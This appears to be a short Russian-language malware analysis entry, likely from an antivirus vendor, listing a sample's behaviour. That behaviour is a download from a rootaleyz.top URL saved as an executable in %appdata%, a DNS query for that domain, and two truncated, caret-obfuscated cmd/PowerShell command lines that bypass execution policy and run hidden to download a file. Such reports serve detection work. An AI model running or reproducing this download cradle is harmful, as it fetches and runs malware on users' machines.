Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwE^RsHe^LL.^E^xE -EX^e^C^Ut^ioNPoLi^CY BYP^aSS^ ^-N^opRO^fIL^e -^w^I^nDOWST^yL^e^ h^IDde^n^ ^(^N^Ew^-^objeCt ^sYS^tEm.N^ET.wEB^cLiEnT).^D^OWnLOADfILE('http://rootaleyz....
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "pOwE^RsHe^LL.^E^xE -EX^e^C^Ut^ioNPoLi^CY BYP^aSS^ ^-N^opRO^fIL^e -^w^I^nDOWST^yL^e^ h^IDde^n^ ^(^N^Ew^-^objeCt ^sYS^tEm.N^ET.wEB^cLiEnT).^D^OWnLOADfILE('http://rootaleyz....' (со скрытым окном)